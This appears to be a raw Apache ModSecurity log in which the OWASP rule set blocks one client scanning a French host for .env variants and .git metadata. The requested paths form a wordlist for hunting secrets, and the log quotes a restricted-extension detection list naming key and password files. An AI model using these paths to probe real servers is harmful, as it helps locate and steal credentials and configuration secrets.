[Mon May 11 20:55:47.434503 2026] [security2:error] [pid 1502013:tid 1502033] [client 195.178.110.199:34226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.swp"] [unique_id "agImM5Yn-x0CHsbEbP2tDQAAAIQ"]
[Mon May 11 20:55:47.437693 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agImMzP5Q_-MBliRCAxm0AAAAAo"]
[Mon May 11 20:55:47.437936 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agImMzP5Q_-MBliRCAxm0AAAAAo"]
[Mon May 11 20:55:47.438255 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.test"] [unique_id "agImMzP5Q_-MBliRCAxm0AAAAAo"]
[Mon May 11 20:55:47.458939 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.testing"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.testing"] [unique_id "agImMzP5Q_-MBliRCAxm0QAAAAo"]
[Mon May 11 20:55:47.459282 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.testing"] [unique_id "agImMzP5Q_-MBliRCAxm0QAAAAo"]
[Mon May 11 20:55:47.459633 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.testing"] [unique_id "agImMzP5Q_-MBliRCAxm0QAAAAo"]
[Mon May 11 20:55:47.565139 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agImMyMeXtzav-mi9SyxHgAAAM8"]
[Mon May 11 20:55:47.565393 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agImMyMeXtzav-mi9SyxHgAAAM8"]
[Mon May 11 20:55:47.565644 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agImMyMeXtzav-mi9SyxHgAAAM8"]
[Mon May 11 20:55:47.569082 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agImM_jVc-A-CSptvm1xDwAAAEg"]
[Mon May 11 20:55:47.569284 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agImM_jVc-A-CSptvm1xDwAAAEg"]
[Mon May 11 20:55:47.569491 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.development"] [unique_id "agImM_jVc-A-CSptvm1xDwAAAEg"]
[Mon May 11 20:55:47.569699 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agImMyMeXtzav-mi9SyxHwAAAM4"]
[Mon May 11 20:55:47.569856 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agImMyMeXtzav-mi9SyxHwAAAM4"]
[Mon May 11 20:55:47.570057 2026] [security2:error] [pid 1516058:tid 1516104] [client 195.178.110.199:34354] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env~"] [unique_id "agImMyMeXtzav-mi9SyxHwAAAM4"]
[Mon May 11 20:55:47.585891 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agImMyMeXtzav-mi9SyxIAAAAM8"]
[Mon May 11 20:55:47.586097 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agImMyMeXtzav-mi9SyxIAAAAM8"]
[Mon May 11 20:55:47.586338 2026] [security2:error] [pid 1516058:tid 1516105] [client 195.178.110.199:34248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agImMyMeXtzav-mi9SyxIAAAAM8"]
[Mon May 11 20:55:47.623920 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.qa"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.qa"] [unique_id "agImM9eaRXe5lR8y0ZOSrgAAAUI"]
[Mon May 11 20:55:47.624072 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.qa"] [unique_id "agImM9eaRXe5lR8y0ZOSrgAAAUI"]
[Mon May 11 20:55:47.624278 2026] [security2:error] [pid 1534836:tid 1534873] [client 195.178.110.199:34324] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.qa"] [unique_id "agImM9eaRXe5lR8y0ZOSrgAAAUI"]
[Mon May 11 20:55:47.625599 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/commit_editmsg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agImM1NddpkriGUb6ZV2TwAAAQw"]
[Mon May 11 20:55:47.625820 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agImM1NddpkriGUb6ZV2TwAAAQw"]
[Mon May 11 20:55:47.626050 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/COMMIT_EDITMSG"] [unique_id "agImM1NddpkriGUb6ZV2TwAAAQw"]
[Mon May 11 20:55:47.688099 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/orig_head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/ORIG_HEAD"] [unique_id "agImMzP5Q_-MBliRCAxm0gAAAAo"]
[Mon May 11 20:55:47.688336 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/ORIG_HEAD"] [unique_id "agImMzP5Q_-MBliRCAxm0gAAAAo"]
[Mon May 11 20:55:47.688583 2026] [security2:error] [pid 1501883:tid 1501895] [client 195.178.110.199:34290] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/ORIG_HEAD"] [unique_id "agImMzP5Q_-MBliRCAxm0gAAAAo"]
[Mon May 11 20:55:47.771908 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.bak"] [unique_id "agImM_jVc-A-CSptvm1xEQAAAEg"]
[Mon May 11 20:55:47.772063 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.bak"] [unique_id "agImM_jVc-A-CSptvm1xEQAAAEg"]
[Mon May 11 20:55:47.772344 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.bak"] [unique_id "agImM_jVc-A-CSptvm1xEQAAAEg"]
[Mon May 11 20:55:47.772614 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/config.bak"] [unique_id "agImM_jVc-A-CSptvm1xEQAAAEg"]
[Mon May 11 20:55:47.773594 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agImM1NddpkriGUb6ZV2UAAAAQw"]
[Mon May 11 20:55:47.773839 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agImM1NddpkriGUb6ZV2UAAAAQw"]
[Mon May 11 20:55:47.774120 2026] [security2:error] [pid 1501831:tid 1501845] [client 195.178.110.199:34304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agImM1NddpkriGUb6ZV2UAAAAQw"]
[Mon May 11 20:55:47.788965 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/description"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.git/description"] [unique_id "agImM_jVc-A-CSptvm1xEgAAAEg"]
[Mon May 11 20:55:47.789125 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.git/description"] [unique_id "agImM_jVc-A-CSptvm1xEgAAAEg"]
[Mon May 11 20:55:47.789318 2026] [security2:error] [pid 1511173:tid 1511184] [client 195.178.110.199:34312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.git/description"] [unique_id "agImM_jVc-A-CSptvm1xEgAAAEg"]
